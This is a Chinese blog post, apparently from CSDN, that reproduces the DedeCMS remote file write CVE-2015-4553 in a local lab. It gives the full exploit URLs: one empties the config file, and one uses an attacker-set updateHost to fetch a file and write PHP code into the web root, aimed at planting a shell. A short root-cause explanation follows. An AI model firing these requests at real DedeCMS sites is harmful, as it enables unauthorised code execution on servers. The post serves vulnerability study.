CVE-2015-4553 Dedecms远程写文件

CVE-2015-4553 Dedecms远程写文件

首页

访问

http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/admin/config_update.php这句话会跳转到http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt中读取内容写入到c:/phpstudy/WWW/config_update.php。访问发现获取失败。

在目标机上192.168.1.3,查看c:/phpstudy/WWW/data/admin/config_update.php,已经由原来的内容变为空的内容。

在192.168.1.2打开phpStudy在C:/phpStudy/WWW下建立dedecms/demodata.a.txt,写入<?php phpinfo();?>

访问:http://192.168.1.3/install/index.php?step=11\&insLockfile=a\&s_lang=a\&install_demo_name=.../data/tchg.php\&updateHost=http://192.168.1.2/,可以看到出现了存在,说明phpinfo已经写进去了![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/ff3eae6b0cc1432ea4c4603c3a954bf2.png)

访问:http://192.168.1.3/data/tchg.php,可以看到phpinfo页面说明真的写进去了。![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/198cefe5a2cf418a9bec2f5ef8fdd5d4.png)

漏洞产生的原因发生在安装页面C:/phpStudy/WWW/install/index.php,如果接收到的参数step=11,然后包含C:/phpStudy/WWW/data/admin/config_update.php。查看config_update.php里面定义了updateHost变量。前面已经把这个文件里的内容给清空了。这里利用了php5.2的特性,全局变量get可以赋值,这样就控制了上传的内容,达到了写shell的目的。

相关推荐
炎码工坊2 小时前
云原生安全实践:CI/CD流水线集成DAST工具
安全·网络安全·微服务·云原生·系统安全
TGC达成共识6 小时前
菌菇食用攻略:从营养解析到安全指南,解锁科学食菌
大数据·人工智能·其他·安全·百度·生活·新浪微博
金灰7 小时前
spider分享--图片
前端·chrome·安全
珹洺7 小时前
MyBatis实战指南(七)MyBatis缓存机制
java·数据库·sql·安全·缓存·oracle·mybatis
加油搞钱加油搞钱8 小时前
鹰盾Win播放器作为专业的视频安全解决方案,除了硬件翻录外还有什么呢?
网络·安全·音视频·视频加密·鹰盾播放器·鹰盾加密器
AcrelGHP8 小时前
建筑末端配电回路安全用电解决方案:筑牢电气防火最后一道防线
人工智能·算法·安全
独行soc8 小时前
2025年渗透测试面试题总结-长亭科技[实习]安全服务工程师题目+回答)
linux·科技·安全·面试·职场和发展·区块链
芯盾时代13 小时前
安全大模型智驱网络和数据安全效能跃迁
网络·人工智能·安全·网络安全
思通数科大数据舆情15 小时前
工业安全零事故的智能守护者:一体化AI智能安防平台
人工智能·安全·目标检测·计算机视觉·目标跟踪·数据挖掘·知识图谱
dalerkd18 小时前
企业产品网络安全日志6月10日-WAF资费消耗排查
网络·安全·web安全